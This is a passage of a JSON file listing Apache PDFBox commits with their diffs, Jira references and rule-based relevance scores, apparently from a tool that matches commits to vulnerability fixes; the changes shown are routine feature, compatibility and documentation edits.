b/examples/src/main/java/org/apache/pdfbox/examples/ant/package.html", + "index 1d70ed480..f5b00c0a1 100644", + "--- a/examples/src/main/java/org/apache/pdfbox/examples/ant/package.html", + "+++ b/examples/src/main/java/org/apache/pdfbox/examples/ant/package.html", + "@@ -23,11 +23,11 @@", + " ANT tasks that utilize PDFBox features can be found in this package.", + "-This is an example of using the PDF2Text task:

    ", + "+This is an example of using the PDF2Text task:

    ", + "-<taskdef name=\"pdf2text\" classname=\"org.apache.pdfbox.ant.PDFToTextTask\" classpathref=\"build.classpath\" />
    ", + "+<taskdef name=\"pdf2text\" classname=\"org.apache.pdfbox.ant.PDFToTextTask\" classpathref=\"build.classpath\" />
    ", + "-<pdf2text>
    ", + "-   <fileset dir=\"test\">
    ", + "-     <include name=\"**/*.pdf\" />
    ", + "-   </fileset>
    ", + "-</pdf2text>
    ", + "+<pdf2text>
    ", + "+   <fileset dir=\"test\">
    ", + "+     <include name=\"**/*.pdf\" />
    ", + "+   </fileset>
    ", + "+</pdf2text>
    ", + " ", + "diff --git a/fontbox/src/main/java/org/apache/fontbox/afm/package.html b/fontbox/src/main/java/org/apache/fontbox/afm/package.html", + "index 4a97e56ca..d8ae7bd94 100644", + "--- a/fontbox/src/main/java/org/apache/fontbox/afm/package.html", + "+++ b/fontbox/src/main/java/org/apache/fontbox/afm/package.html", + "@@ -23,3 +23,3 @@", + " This package holds classes used to parse AFM(Adobe Font Metrics) files.", + "-
    ", + "+
    ", + " More information about AFM files can be found at", + "diff --git a/pdfbox/src/main/java/org/apache/pdfbox/cos/package.html b/pdfbox/src/main/java/org/apache/pdfbox/cos/package.html", + "index 5c4fd8946..67e41187c 100644", + "--- a/pdfbox/src/main/java/org/apache/pdfbox/cos/package.html", + "+++ b/pdfbox/src/main/java/org/apache/pdfbox/cos/package.html", + "@@ -23,3 +23,3 @@", + " These are the low level objects that make up a PDF document.", + "-

    ", + "+

    " + ], + "changed_files": [ + "examples/src/main/java/org/apache/pdfbox/examples/ant/package.html", + "fontbox/src/main/java/org/apache/fontbox/afm/package.html", + "pdfbox/src/main/java/org/apache/pdfbox/cos/package.html" + ], + "message_reference_content": [], + "jira_refs": { + "PDFBOX-4112": "" + }, + "ghissue_refs": {}, + "cve_refs": [], + "twins": [ + [ + "no-tag", + "ebe874e6d4e86eb4cbd00122d9c6ca87d9baf107" + ], + [ + "no-tag", + "35487547ec8778314a3b9802cf734769b03d9292" + ] + ], + "tags": [ + "3.0.0", + "3.0.0-RC1", + "3.0.0-alpha2", + "3.0.0-alpha3", + "3.0.0-beta1", + "3.0.1", + "3.0.2" + ], + "matched_rules": [ + { + "id": "CHANGES_RELEVANT_CODE", + "message": "The commit modifies code containing relevant filename or methods: PDF", + "relevance": 8 + }, + { + "id": "COMMIT_HAS_TWINS", + "message": "This commit has one or more twins.", + "relevance": 2 + }, + { + "id": "BUG_IN_MESSAGE", + "message": "The commit message references some bug tracking ticket: PDFBOX-4112", + "relevance": 2 + } + ] + }, + { + "commit_id": "7a146884d4a177f2e3e838237028f2f66401e317", + "repository": "https://github.com/apache/pdfbox", + "timestamp": 1523125977, + "hunks": 7, + "message": "PDFBOX-4186: add quality option to pdfbox-app, as suggested by Martin Hausner git-svn-id: https://svn.apache.org/repos/asf/pdfbox/branches/2.0@1828603 13f79535-47bb-0310-9956-ffa450edef68", + "diff": [ + "diff --git a/tools/src/main/java/org/apache/pdfbox/tools/PDFToImage.java b/tools/src/main/java/org/apache/pdfbox/tools/PDFToImage.java", + "index 9b1adaa6f..ffb24dacc 100644", + "--- a/tools/src/main/java/org/apache/pdfbox/tools/PDFToImage.java", + "+++ b/tools/src/main/java/org/apache/pdfbox/tools/PDFToImage.java", + "@@ -51,2 +51,3 @@ public final class PDFToImage", + " private static final String DPI = \"-dpi\";", + "+ private static final String QUALITY = \"-quality\";", + " private static final String CROPBOX = \"-cropbox\";", + "@@ -93,2 +94,3 @@ public final class PDFToImage", + " int dpi;", + "+ float quality = 1.0f;", + " float cropBoxLowerLeftX = 0;", + "@@ -165,2 +167,7 @@ public final class PDFToImage", + " }", + "+ else if( args[i].equals( QUALITY ) )", + "+ {", + "+ i++;", + "+ quality = Float.parseFloat(args[i]);", + "+ }", + " else if( args[i].equals( CROPBOX ) )", + "@@ -248,3 +255,3 @@ public final class PDFToImage", + " String fileName = outputPrefix + (i + 1) + \".\" + imageFormat;", + "- success &= ImageIOUtil.writeImage(image, fileName, dpi);", + "+ success &= ImageIOUtil.writeImage(image, fileName, dpi, quality);", + " }", + "@@ -291,4 +298,4 @@ public final class PDFToImage", + " + \" -endPage : The last page to extract(inclusive)\\n\"", + "- + \" -color : The color depth (valid: bilevel, gray, rgb, rgba)\\n\"", + "- + \" -dpi : The DPI of the output image\\n\"", + "+ + \" -color : The color depth (valid: bilevel, gray, rgb (default), rgba)\\n\"", + "+ + \" -quality : The quality to be used when compressing the image (0 < quality <= 1 (default))\\n\"", + " + \" -cropbox : The page area to export\\n\"", + "diff --git a/tools/src/main/java/org/apache/pdfbox/tools/imageio/ImageIOUtil.java b/tools/src/main/java/org/apache/pdfbox/tools/imageio/ImageIOUtil.java", + "index 115041047..d3fa60cfb 100644", + "--- a/tools/src/main/java/org/apache/pdfbox/tools/imageio/ImageIOUtil.java", + "+++ b/tools/src/main/java/org/apache/pdfbox/tools/imageio/ImageIOUtil.java", + "@@ -66,2 +66,21 @@ public final class ImageIOUtil", + " int dpi) throws IOException", + "+ {", + "+ return writeImage(image, filename, dpi, 1.0f);", + "+ }", + "+", + "+ /**", + "+ * Writes a buffered image to a file using the given image format.", + "+ * See {@link #writeImage(BufferedImage image, String formatName,", + "+ * OutputStream output, int dpi, float quality)} for more details.", + "+ *", + "+ * @param image the image to be written", + "+ * @param filename used to construct the filename for the individual image. Its suffix will be", + "+ * used as the image format.", + "+ * @param dpi the resolution in dpi (dots per inch) to be used in metadata", + "+ * @param quality quality to be used when compressing the image (0 < quality < 1.0f)", + "+ * @return true if the image file was produced, false if there was an error.", + "+ * @throws IOException if an I/O error occurs", + "+ */", + "+ public static boolean writeImage(BufferedImage image, String filename,", + "+ int dpi, float quality) throws IOException", + " {", + "@@ -72,3 +91,3 @@ public final class ImageIOUtil", + " String formatName = filename.substring(filename.lastIndexOf('.') + 1);", + "- return writeImage(image, formatName, output, dpi);", + "+ return writeImage(image, formatName, output, dpi, quality);", + " }" + ], + "changed_files": [ + "tools/src/main/java/org/apache/pdfbox/tools/PDFToImage.java", + "tools/src/main/java/org/apache/pdfbox/tools/imageio/ImageIOUtil.java" + ], + "message_reference_content": [], + "jira_refs": { + "PDFBOX-4186": "" + }, + "ghissue_refs": {}, + "cve_refs": [], + "twins": [ + [ + "no-tag", + "8bbe2b26a1d95134a77fdbab3860d067b99fca3b" + ] + ], + "tags": [ + "2.0.10", + "2.0.11", + "2.0.12", + "2.0.13", + "2.0.14", + "2.0.15", + "2.0.16", + "2.0.17", + "2.0.18", + "2.0.19", + "2.0.20", + "2.0.21", + "2.0.22", + "2.0.23", + "2.0.24", + "2.0.25", + "2.0.26", + "2.0.27", + "2.0.28", + "2.0.29", + "2.0.30", + "2.0.31", + "2.0.32" + ], + "matched_rules": [ + { + "id": "CHANGES_RELEVANT_CODE", + "message": "The commit modifies code containing relevant filename or methods: PDF", + "relevance": 8 + }, + { + "id": "COMMIT_HAS_TWINS", + "message": "This commit has one or more twins.", + "relevance": 2 + }, + { + "id": "BUG_IN_MESSAGE", + "message": "The commit message references some bug tracking ticket: PDFBOX-4186", + "relevance": 2 + } + ] + }, + { + "commit_id": "9de7202b151168b9502059980fda6cc55aa32d56", + "repository": "https://github.com/apache/pdfbox", + "timestamp": 1531850440, + "hunks": 16, + "message": "PDFBOX-4013: support MacOS features on jdk9, by Emmeran Seehuber git-svn-id: https://svn.apache.org/repos/asf/pdfbox/trunk@1836123 13f79535-47bb-0310-9956-ffa450edef68", + "diff": [ + "diff --git a/debugger/src/main/java/org/apache/pdfbox/debugger/PDFDebugger.java b/debugger/src/main/java/org/apache/pdfbox/debugger/PDFDebugger.java", + "index a9017b4c8..66683311f 100644", + "--- a/debugger/src/main/java/org/apache/pdfbox/debugger/PDFDebugger.java", + "+++ b/debugger/src/main/java/org/apache/pdfbox/debugger/PDFDebugger.java", + "@@ -47,3 +47,2 @@ import java.util.Properties;", + " import java.util.Set;", + "-import java.util.StringTokenizer;", + " import javax.imageio.spi.IIORegistry;", + "@@ -452,6 +451,17 @@ public class PDFDebugger extends JFrame", + "+ initGlobalEventHandlers();", + "+", + "+ }", + "+", + "+ /**", + "+ * Initialise application global event handlers.", + "+ * Protected to allow subclasses to override this method if they", + "+ * don't want the global event handler overridden.", + "+ */", + "+ @SuppressWarnings(\"WeakerAccess\")", + "+ protected void initGlobalEventHandlers()", + "+ {", + " // Mac OS X file open/quit handler", + "- if (IS_MAC_OS && !isMinJdk9())", + "+ if (IS_MAC_OS)", + " {", + "- //TODO this needs to be rewritten for JDK9, see PDFBOX-4013", + " try", + "@@ -567,7 +577,4 @@ public class PDFDebugger extends JFrame", + "- if (!IS_MAC_OS)", + "- {", + "- fileMenu.addSeparator();", + "- fileMenu.add(printMenuItem);", + "- }", + "+ fileMenu.addSeparator();", + "+ fileMenu.add(printMenuItem);", + "@@ -730,3 +737,3 @@ public class PDFDebugger extends JFrame", + " {", + "- readPDFFile(openDialog.getFile(), \"\");", + "+ readPDFFile(new File(openDialog.getDirectory(),openDialog.getFile()), \"\");", + " }", + "@@ -1175,3 +1182,3 @@ public class PDFDebugger extends JFrame", + "- private void exitMenuItemActionPerformed(ActionEvent evt)", + "+ private void exitMenuItemActionPerformed(ActionEvent ignored)", + " {", + "@@ -1193,2 +1200,12 @@ public class PDFDebugger extends JFrame", + " }", + "+ performApplicationExit();", + "+ }", + "+", + "+ /**", + "+ * Exit the application after the window is closed. This is protected to", + "+ * let subclasses override the behavior.", + "+ */", + "+ @SuppressWarnings(\"WeakerAccess\")", + "+ protected void performApplicationExit()", + "+ {", + " System.exit(0);", + "@@ -1249,19 +1266,3 @@ public class PDFDebugger extends JFrame", + " {", + "- if( document != null )", + "- {", + "- try", + "- {", + "- document.close();", + "- if (!currentFilePath.startsWith(\"http\"))", + "- {", + "- recentFiles.addFile(currentFilePath);", + "- }", + "- recentFiles.close();", + "- }", + "- catch( IOException e )", + "- {", + "- throw new RuntimeException(e);", + "- }", + "- }", + "- System.exit(0);", + "+ exitMenuItemActionPerformed(null);", + " }", + "@@ -1496,24 +1497,2 @@ public class PDFDebugger extends JFrame", + " }", + "- ", + "- private static boolean isMinJdk9()", + "- {", + "- // strategy from lucene-solr/lucene/core/src/java/org/apache/lucene/util/Constants.java", + "- String version = System.getProperty(\"java.specification.version\");", + "- final StringTokenizer st = new StringTokenizer(version, \".\");", + "- try", + "- {", + "- int major = Integer.parseInt(st.nextToken());", + "- int minor = 0;", + "- if (st.hasMoreTokens())", + "- {", + "- minor = Integer.parseInt(st.nextToken());", + "- }", + "- return major > 1 || (major == 1 && minor >= 9);", + "- }", + "- catch (NumberFormatException nfe)", + "- {", + "- // maybe some new numbering scheme in the 22nd century", + "- return true;", + "- }", + "- }", + " }", + "diff --git a/debugger/src/main/java/org/apache/pdfbox/debugger/ui/OSXAdapter.java b/debugger/src/main/java/org/apache/pdfbox/debugger/ui/OSXAdapter.java", + "index 2ed504ef4..5b24bfa82 100644", + "--- a/debugger/src/main/java/org/apache/pdfbox/debugger/ui/OSXAdapter.java", + "+++ b/debugger/src/main/java/org/apache/pdfbox/debugger/ui/OSXAdapter.java", + "@@ -20,3 +20,3 @@", + " * This file includes code under the following terms:", + "- * \t\t\t", + "+ *", + " * Version: 2.0", + "@@ -66,2 +66,4 @@ package org.apache.pdfbox.debugger.ui;", + "+import java.awt.Desktop;", + "+import java.io.File;", + " import java.lang.reflect.InvocationHandler;", + "@@ -70,2 +72,4 @@ import java.lang.reflect.Method;", + " import java.lang.reflect.Proxy;", + "+import java.util.StringTokenizer;", + "+import java.util.List;", + "@@ -89,2 +93,24 @@ public class OSXAdapter implements InvocationHandler", + " static Object macOSXApplication;", + "+ ", + "+ private static boolean isMinJdk9()", + "+ {", + "+ // strategy from lucene-solr/lucene/core/src/java/org/apache/lucene/util/Constants.java", + "+ String version = System.getProperty(\"java.specification.version\");", + "+ final StringTokenizer st = new StringTokenizer(version, \".\");", + "+ try", + "+ {", + "+ int major = Integer.parseInt(st.nextToken());", + "+ int minor = 0;", + "+ if (st.hasMoreTokens())", + "+ {", + "+ minor = Integer.parseInt(st.nextToken());", + "+ }", + "+ return major > 1 || (major == 1 && minor >= 9);", + "+ }", + "+ catch (NumberFormatException nfe)", + "+ {", + "+ // maybe some new numbering scheme in the 22nd century", + "+ return true;", + "+ }", + "+ }", + "@@ -92,3 +118,38 @@ public class OSXAdapter implements InvocationHandler", + " // The method passed should return a boolean stating whether or not the quit should occur", + "- public static void setQuitHandler(Object target, Method quitHandler) {", + "+ public static void setQuitHandler(final Object target, final Method quitHandler)", + "+ {", + "+ if (isMinJdk9())", + "+ {", + "+ try", + "+ {", + "+ Desktop desktopObject = Desktop.getDesktop();", + "+ Class filesHandlerClass = Class.forName(\"java.awt.desktop.QuitHandler\");", + "+ final Method setQuitHandlerMethod = desktopObject.getClass().getMethod(\"setQuitHandler\", filesHandlerClass);", + "+ Object osxAdapterProxy = Proxy.newProxyInstance(OSXAdapter.class.getClassLoader(),", + "+ new Class[]", + "+ {", + "+ filesHandlerClass", + "+ }, new InvocationHandler()", + "+ {", + "+ @Override", + "+ public Object invoke(Object proxy, Method method, Object[] args)", + "+ throws Throwable", + "+ {", + "+ if (!method.getName().equals(\"handleQuitRequestWith\"))", + "+ {", + "+ return null;", + "+ }", + "+ // We just call our own quit handler", + "+ quitHandler.invoke(target);", + "+ return null;", + "+ }", + "+ });", + "+ setQuitHandlerMethod.invoke(desktopObject, osxAdapterProxy);", + "+ }", + "+ catch (Exception e)", + "+ {", + "+ e.printStackTrace();", + "+ }", + "+ return;", + "+ }", + " setHandler(new OSXAdapter(\"handleQuit\", target, quitHandler));", + "@@ -135,3 +196,49 @@ public class OSXAdapter implements InvocationHandler", + " // application bundle's Info.plist", + "- public static void setFileHandler(Object target, Method fileHandler) {", + "+ public static void setFileHandler(Object target, Method fileHandler)", + "+ {", + "+ if (isMinJdk9())", + "+ {", + "+ try", + "+ {", + "+ Desktop desktopObject = Desktop.getDesktop();", + "+ Class filesHandlerClass = Class.forName(\"java.awt.desktop.OpenFilesHandler\");", + "+ Method setOpenFileHandlerMethod = desktopObject.getClass().getMethod(\"setOpenFileHandler\", filesHandlerClass);", + "+ Object osxAdapterProxy = Proxy.newProxyInstance(OSXAdapter.class.getClassLoader(),", + "+ new Class[]", + "+ {", + "+ filesHandlerClass", + "+ }, new OSXAdapter(\"openFiles\", target, fileHandler)", + "+ {", + "+ // Override OSXAdapter.callTarget to send information on the", + "+ // file to be opened", + "+ public boolean callTarget(Object openFilesEvent)", + "+ {", + "+ if (openFilesEvent != null)", + "+ {", + "+ try", + "+ {", + "+ Method getFilesMethod = openFilesEvent.getClass().getDeclaredMethod(\"getFiles\",", + "+ (Class[]) null);", + "+ @SuppressWarnings(\"unchecked\")", + "+ List files = (List) getFilesMethod.invoke(openFilesEvent,", + "+ (Object[]) null);", + "+ this.targetMethod.invoke(this.targetObject, files.get(0).getAbsolutePath());", + "+ }", + "+ catch (Exception ex)", + "+ {", + "+ throw new RuntimeException(ex);", + "+ }", + "+ }", + "+ return true;", + "+ }", + "+ });", + "+ setOpenFileHandlerMethod.invoke(desktopObject, osxAdapterProxy);", + "+ }", + "+ catch (Exception e)", + "+ {", + "+ e.printStackTrace();", + "+ }", + "+ return;", + "+ }", + "+ /* JDK <= 1.8, using Apple classes */", + " setHandler(new OSXAdapter(\"handleOpenFile\", target, fileHandler) {" + ], + "changed_files": [ + "debugger/src/main/java/org/apache/pdfbox/debugger/PDFDebugger.java", + "debugger/src/main/java/org/apache/pdfbox/debugger/ui/OSXAdapter.java" + ], + "message_reference_content": [], + "jira_refs": { + "PDFBOX-4013": "" + }, + "ghissue_refs": {}, + "cve_refs": [], + "twins": [ + [ + "no-tag", + "63d9c2cbff461d239993a40272938ea45dde6ffd" + ] + ], + "tags": [ + "3.0.0", + "3.0.0-RC1", + "3.0.0-alpha2", + "3.0.0-alpha3", + "3.0.0-beta1", + "3.0.1", + "3.0.2" + ], + "matched_rules": [ + { + "id": "CHANGES_RELEVANT_CODE", + "message": "The commit modifies code containing relevant filename or methods: PDF", + "relevance": 8 + }, + { + "id": "COMMIT_HAS_TWINS", + "message": "This commit has one or more twins.", + "relevance": 2 + }, + { + "id": "BUG_IN_MESSAGE", + "message": "The commit message references some bug tracking ticket: PDFBOX-4013", + "relevance": 2 + } + ] + }, + { + "commit_id": "51580f2fd7982d8a787dffb1242e93d27aa996f1", + "repository": "https://github.com/apache/pdfbox", + "timestamp": 1532022809, + "hunks": 2, + "message": "PDFBOX-4268: ignore barcode font if we aren't searching for one git-svn-id: https://svn.apache.org/repos/asf/pdfbox/branches/2.0@1836285 13f79535-47bb-0310-9956-ffa450edef68", + "diff": [ + "diff --git a/pdfbox/src/main/java/org/apache/pdfbox/pdmodel/font/FontMapperImpl.java b/pdfbox/src/main/java/org/apache/pdfbox/pdmodel/font/FontMapperImpl.java", + "index e12ab49c6..549c3edd2 100644", + "--- a/pdfbox/src/main/java/org/apache/pdfbox/pdmodel/font/FontMapperImpl.java", + "+++ b/pdfbox/src/main/java/org/apache/pdfbox/pdmodel/font/FontMapperImpl.java", + "@@ -562,2 +562,10 @@ final class FontMapperImpl implements FontMapper", + " {", + "+ if (panose.getFamilyKind() == 0 && ", + "+ (info.getPostScriptName().toLowerCase().contains(\"barcode\") ||", + "+ info.getPostScriptName().startsWith(\"Code\")) && ", + "+ !probablyBarcodeFont(fontDescriptor))", + "+ {", + "+ // PDFBOX-4268: ignore barcode font if we aren't searching for one.", + "+ continue;", + "+ }", + " // serifs", + "@@ -626,2 +634,18 @@ final class FontMapperImpl implements FontMapper", + "+ private boolean probablyBarcodeFont(PDFontDescriptor fontDescriptor)", + "+ {", + "+ String ff = fontDescriptor.getFontFamily();", + "+ if (ff == null)", + "+ {", + "+ ff = \"\";", + "+ }", + "+ String fn = fontDescriptor.getFontName();", + "+ if (fn == null)", + "+ {", + "+ fn = \"\";", + "+ }", + "+ return ff.startsWith(\"Code\") || ff.toLowerCase().contains(\"barcode\") ||", + "+ fn.startsWith(\"Code\") || fn.toLowerCase().contains(\"barcode\");", + "+ }", + "+", + " /**" + ], + "changed_files": [ + "pdfbox/src/main/java/org/apache/pdfbox/pdmodel/font/FontMapperImpl.java" + ], + "message_reference_content": [], + "jira_refs": { + "PDFBOX-4268": "" + }, + "ghissue_refs": {}, + "cve_refs": [], + "twins": [ + [ + "no-tag", + "28915170e0a89d632b5f0a83ddb0162e300dee8e" + ] + ], + "tags": [ + "2.0.12", + "2.0.13", + "2.0.14", + "2.0.15", + "2.0.16", + "2.0.17", + "2.0.18", + "2.0.19", + "2.0.20", + "2.0.21", + "2.0.22", + "2.0.23", + "2.0.24", + "2.0.25", + "2.0.26", + "2.0.27", + "2.0.28", + "2.0.29", + "2.0.30", + "2.0.31", + "2.0.32" + ], + "matched_rules": [ + { + "id": "CHANGES_RELEVANT_CODE", + "message": "The commit modifies code containing relevant filename or methods: PDF", + "relevance": 8 + }, + { + "id": "COMMIT_HAS_TWINS", + "message": "This commit has one or more twins.", + "relevance": 2 + }, + { + "id": "BUG_IN_MESSAGE", + "message": "The commit message references some bug tracking ticket: PDFBOX-4268", + "relevance": 2 + } + ] + }, + { + "commit_id": "011f6684cca6b23b90412882ba1bad61135e8720", + "repository": "https://github.com/apache/pdfbox", + "timestamp": 1523126756, + "hunks": 1, + "message": "PDFBOX-4186: restore and improve dpi usage git-svn-id: https://svn.apache.org/repos/asf/pdfbox/branches/2.0@1828607 13f79535-47bb-0310-9956-ffa450edef68", + "diff": [ + "diff --git a/tools/src/main/java/org/apache/pdfbox/tools/PDFToImage.java b/tools/src/main/java/org/apache/pdfbox/tools/PDFToImage.java", + "index ffb24dacc..597958353 100644", + "--- a/tools/src/main/java/org/apache/pdfbox/tools/PDFToImage.java", + "+++ b/tools/src/main/java/org/apache/pdfbox/tools/PDFToImage.java", + "@@ -299,2 +299,3 @@ public final class PDFToImage", + " + \" -color : The color depth (valid: bilevel, gray, rgb (default), rgba)\\n\"", + "+ + \" -dpi : The DPI of the output image, default: screen resolution or 96 if unknown\\n\"", + " + \" -quality : The quality to be used when compressing the image (0 < quality <= 1 (default))\\n\"" + ], + "changed_files": [ + "tools/src/main/java/org/apache/pdfbox/tools/PDFToImage.java" + ], + "message_reference_content": [], + "jira_refs": { + "PDFBOX-4186": "" + }, + "ghissue_refs": {}, + "cve_refs": [], + "twins": [ + [ + "no-tag", + "1d7625a5faf0b329a69a15e8fea8b3b8044009eb" + ] + ], + "tags": [ + "2.0.10", + "2.0.11", + "2.0.12", + "2.0.13", + "2.0.14", + "2.0.15", + "2.0.16", + "2.0.17", + "2.0.18", + "2.0.19", + "2.0.20", + "2.0.21", + "2.0.22", + "2.0.23", + "2.0.24", + "2.0.25", + "2.0.26", + "2.0.27", + "2.0.28", + "2.0.29", + "2.0.30", + "2.0.31", + "2.0.32" + ], + "matched_rules": [ + { + "id": "CHANGES_RELEVANT_CODE", + "message": "The commit modifies code containing relevant filename or methods: PDF", + "relevance": 8 + }, + { + "id": "COMMIT_HAS_TWINS", + "message": "This commit has one or more twins.", + "relevance": 2 + }, + { + "id": "BUG_IN_MESSAGE", + "message": "The commit message references some bug tracking ticket: PDFBOX-4186", + "relevance": 2 + } + ] + }, + { + "commit_id": "c203f812d7c0fb471244889eb4e7a7a6851c002d", + "repository": "https://github.com/apache/pdfbox", + "timestamp": 1525171203, + "hunks": 5, + "message": "PDFBOX-4057: allow rendering with different X and Y scale as proposed by Cornelis Hoeflake git-svn-id: https://svn.apache.org/repos/asf/pdfbox/trunk@1830667 13f79535-47bb-0310-9956-ffa450edef68", + "diff": [ + "diff --git a/pdfbox/src/main/java/org/apache/pdfbox/rendering/PDFRenderer.java b/pdfbox/src/main/java/org/apache/pdfbox/rendering/PDFRenderer.java", + "index 3fce14fa1..ee2a988cd 100644", + "--- a/pdfbox/src/main/java/org/apache/pdfbox/rendering/PDFRenderer.java", + "+++ b/pdfbox/src/main/java/org/apache/pdfbox/rendering/PDFRenderer.java", + "@@ -219,3 +219,3 @@ public class PDFRenderer", + "- transform(g, page, scale);", + "+ transform(g, page, scale, scale);", + "@@ -264,2 +264,17 @@ public class PDFRenderer", + " throws IOException", + "+ {", + "+ renderPageToGraphics(pageIndex, graphics, scale, scale);", + "+ }", + "+", + "+ /**", + "+ * Renders a given page to an AWT Graphics2D instance.", + "+ * ", + "+ * @param pageIndex the zero-based index of the page to be converted", + "+ * @param graphics the Graphics2D on which to draw the page", + "+ * @param scaleX the scale to draw the page at for the x-axis", + "+ * @param scaleY the scale to draw the page at for the y-axis", + "+ * @throws IOException if the PDF cannot be read", + "+ */", + "+ public void renderPageToGraphics(int pageIndex, Graphics2D graphics, float scaleX, float scaleY)", + "+ throws IOException", + " {", + "@@ -268,3 +283,3 @@ public class PDFRenderer", + "- transform(graphics, page, scale);", + "+ transform(graphics, page, scaleX, scaleY);", + "@@ -280,5 +295,5 @@ public class PDFRenderer", + " // scale rotate translate", + "- private void transform(Graphics2D graphics, PDPage page, float scale)", + "+ private void transform(Graphics2D graphics, PDPage page, float scaleX, float scaleY)", + " {", + "- graphics.scale(scale, scale);", + "+ graphics.scale(scaleX, scaleY);" + ], + "changed_files": [ + "pdfbox/src/main/java/org/apache/pdfbox/rendering/PDFRenderer.java" + ], + "message_reference_content": [], + "jira_refs": { + "PDFBOX-4057": "" + }, + "ghissue_refs": {}, + "cve_refs": [], + "twins": [ + [ + "no-tag", + "855bfb5360d114715e3785a59aa48b5c664b602b" + ] + ], + "tags": [ + "3.0.0", + "3.0.0-RC1", + "3.0.0-alpha2", + "3.0.0-alpha3", + "3.0.0-beta1", + "3.0.1", + "3.0.2" + ], + "matched_rules": [ + { + "id": "CHANGES_RELEVANT_CODE", + "message": "The commit modifies code containing relevant filename or methods: PDF", + "relevance": 8 + }, + { + "id": "COMMIT_HAS_TWINS", + "message": "This commit has one or more twins.", + "relevance": 2 + }, + { + "id": "BUG_IN_MESSAGE", + "message": "The commit message references some bug tracking ticket: PDFBOX-4057", + "relevance": 2 + } + ] + }, + { + "commit_id": "412ae902bd7383e1367d325cf2d18404f747a86c", + "repository": "https://github.com/apache/pdfbox", + "timestamp": 1529946800, + "hunks": 8, + "message": "PDFBOX-4241: clarify in javadoc that output stream will be closed git-svn-id: https://svn.apache.org/repos/asf/pdfbox/branches/2.0@1834348 13f79535-47bb-0310-9956-ffa450edef68", + "diff": [ + "diff --git a/pdfbox/src/main/java/org/apache/pdfbox/pdfwriter/COSWriter.java b/pdfbox/src/main/java/org/apache/pdfbox/pdfwriter/COSWriter.java", + "index b785360cd..a90a5e3a2 100644", + "--- a/pdfbox/src/main/java/org/apache/pdfbox/pdfwriter/COSWriter.java", + "+++ b/pdfbox/src/main/java/org/apache/pdfbox/pdfwriter/COSWriter.java", + "@@ -222,5 +222,6 @@ public class COSWriter implements ICOSVisitor, Closeable", + " /**", + "- * COSWriter constructor comment.", + "+ * COSWriter constructor.", + " *", + "- * @param outputStream The wrapped output stream.", + "+ * @param outputStream The output stream to write the PDF. It will be closed when this object is", + "+ * closed.", + " */", + "@@ -233,7 +234,8 @@ public class COSWriter implements ICOSVisitor, Closeable", + " /**", + "- * COSWriter constructor for incremental updates. ", + "+ * COSWriter constructor for incremental updates.", + " *", + "- * @param outputStream output stream where the new PDF data will be written", + "+ * @param outputStream output stream where the new PDF data will be written. It will be closed", + "+ * when this object is closed.", + " * @param inputData random access read containing source PDF data", + "- * ", + "+ *", + " * @throws IOException if something went wrong", + "diff --git a/pdfbox/src/main/java/org/apache/pdfbox/pdmodel/PDDocument.java b/pdfbox/src/main/java/org/apache/pdfbox/pdmodel/PDDocument.java", + "index c3f0a60e4..956916d94 100644", + "--- a/pdfbox/src/main/java/org/apache/pdfbox/pdmodel/PDDocument.java", + "+++ b/pdfbox/src/main/java/org/apache/pdfbox/pdmodel/PDDocument.java", + "@@ -1254,5 +1254,5 @@ public class PDDocument implements Closeable", + " * This will save the document to an output stream.", + "- * ", + "- * @param output The stream to write to. It is recommended to wrap it in a", + "- * {@link java.io.BufferedOutputStream}, unless it is already buffered.", + "+ *", + "+ * @param output The stream to write to. It will be closed when done. It is recommended to wrap", + "+ * it in a {@link java.io.BufferedOutputStream}, unless it is already buffered.", + " *", + "@@ -1290,3 +1290,4 @@ public class PDDocument implements Closeable", + " *", + "- * @param output stream to write. It should not point to the source file.", + "+ * @param output stream to write to. It will be closed when done. It should not", + "+ * point to the source file.", + " * @throws IOException if the output could not be written", + "@@ -1346,3 +1347,4 @@ public class PDDocument implements Closeable", + " *", + "- * @param output stream to write final PDF. It should not point to the source file.", + "+ * @param output stream to write the final PDF. It should not point to the source", + "+ * file. It will be closed when the document is closed.", + " * @return instance to be used for external signing and setting CMS signature" + ], + "changed_files": [ + "pdfbox/src/main/java/org/apache/pdfbox/pdfwriter/COSWriter.java", + "pdfbox/src/main/java/org/apache/pdfbox/pdmodel/PDDocument.java" + ], + "message_reference_content": [], + "jira_refs": { + "PDFBOX-4241": "" + }, + "ghissue_refs": {}, + "cve_refs": [], + "twins": [ + [ + "no-tag", + "e7630469a13b32f919ee919af14ebb78b3d217b5" + ] + ], + "tags": [ + "2.0.11", + "2.0.12", + "2.0.13", + "2.0.14", + "2.0.15", + "2.0.16", + "2.0.17", + "2.0.18", + "2.0.19", + "2.0.20", + "2.0.21", + "2.0.22", + "2.0.23", + "2.0.24", + "2.0.25", + "2.0.26", + "2.0.27", + "2.0.28", + "2.0.29", + "2.0.30", + "2.0.31", + "2.0.32" + ], + "matched_rules": [ + { + "id": "CHANGES_RELEVANT_CODE", + "message": "The commit modifies code containing relevant filename or methods: PDF", + "relevance": 8 + }, + { + "id": "COMMIT_HAS_TWINS", + "message": "This commit has one or more twins.", + "relevance": 2 + }, + { + "id": "BUG_IN_MESSAGE", + "message": "The commit message references some bug tracking ticket: PDFBOX-4241", + "relevance": 2 + } + ] + }, + { + "commit_id": "0d5c9b86a9a2935920170233722c06a3846d65eb", + "repository": "https://github.com/apache/pdfbox", + "timestamp": 1527098434, + "hunks": 3, + "message": "PDFBOX-4095: implement non separable blend modes (hue, saturation, color, luminosity), by Savan Patel and Jani Pehkonen git-svn-id: https://svn.apache.org/repos/asf/pdfbox/branches/2.0@1832117 13f79535-47bb-0310-9956-ffa450edef68", + "diff": [ + "diff --git a/pdfbox/src/main/java/org/apache/pdfbox/pdmodel/graphics/blend/BlendComposite.java b/pdfbox/src/main/java/org/apache/pdfbox/pdmodel/graphics/blend/BlendComposite.java", + "index 8907f01f2..c1596f0b1 100644", + "--- a/pdfbox/src/main/java/org/apache/pdfbox/pdmodel/graphics/blend/BlendComposite.java", + "+++ b/pdfbox/src/main/java/org/apache/pdfbox/pdmodel/graphics/blend/BlendComposite.java", + "@@ -1,228 +1,274 @@", + "-/*", + "- * Licensed to the Apache Software Foundation (ASF) under one or more", + "- * contributor license agreements. See the NOTICE file distributed with", + "- * this work for additional information regarding copyright ownership.", + "- * The ASF licenses this file to You under the Apache License, Version 2.0", + "- * (the \"License\"); you may not use this file except in compliance with", + "- * the License. You may obtain a copy of the License at", + "- *", + "- * http://www.apache.org/licenses/LICENSE-2.0", + "- *", + "- * Unless required by applicable law or agreed to in writing, software", + "- * distributed under the License is distributed on an \"AS IS\" BASIS,", + "- * WITHOUT 